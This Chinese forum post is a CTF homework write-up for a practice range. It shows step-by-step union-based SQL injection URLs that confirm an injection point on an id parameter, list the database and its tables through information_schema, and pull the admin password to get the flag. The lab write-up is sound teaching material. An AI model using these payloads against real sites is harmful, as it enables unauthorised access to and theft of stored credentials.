论坛首页 > CTF&WP专版

sql 注入原理1 作业提交

mrchen   ·   发表于 2018-07-14 16:09:52   ·   CTF&WP专版

1、进入靶场,显示正产页面

                                      

2、测试注入点是否存在 http://120.203.13.111:6815/?id=1' 或者http://120.203.13.111:6815/?id=1 and 1=2皆返回不正常页面,表示注入点存在。

                                    

3、通过注入语句 http://120.203.13.111:6815/?id=1 and 1=2 union select 1,database() 获取数据库库名。

                              

4、通过注入语句http://120.203.13.111:6815/?id=1 and 1=2 union select table_name from information_schema.tables where table_schema=database() 获取数据库表名

                              

5、通过注入语句http://120.203.13.111:6815/?id=1 and 1=2 union select password from admin 直接获取flag

                               

打赏我,让我更有动力~

1 条回复   |  直到 2018-7-20 | 1506 次浏览

admin0day
发表于 2018-7-20

厉害!

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.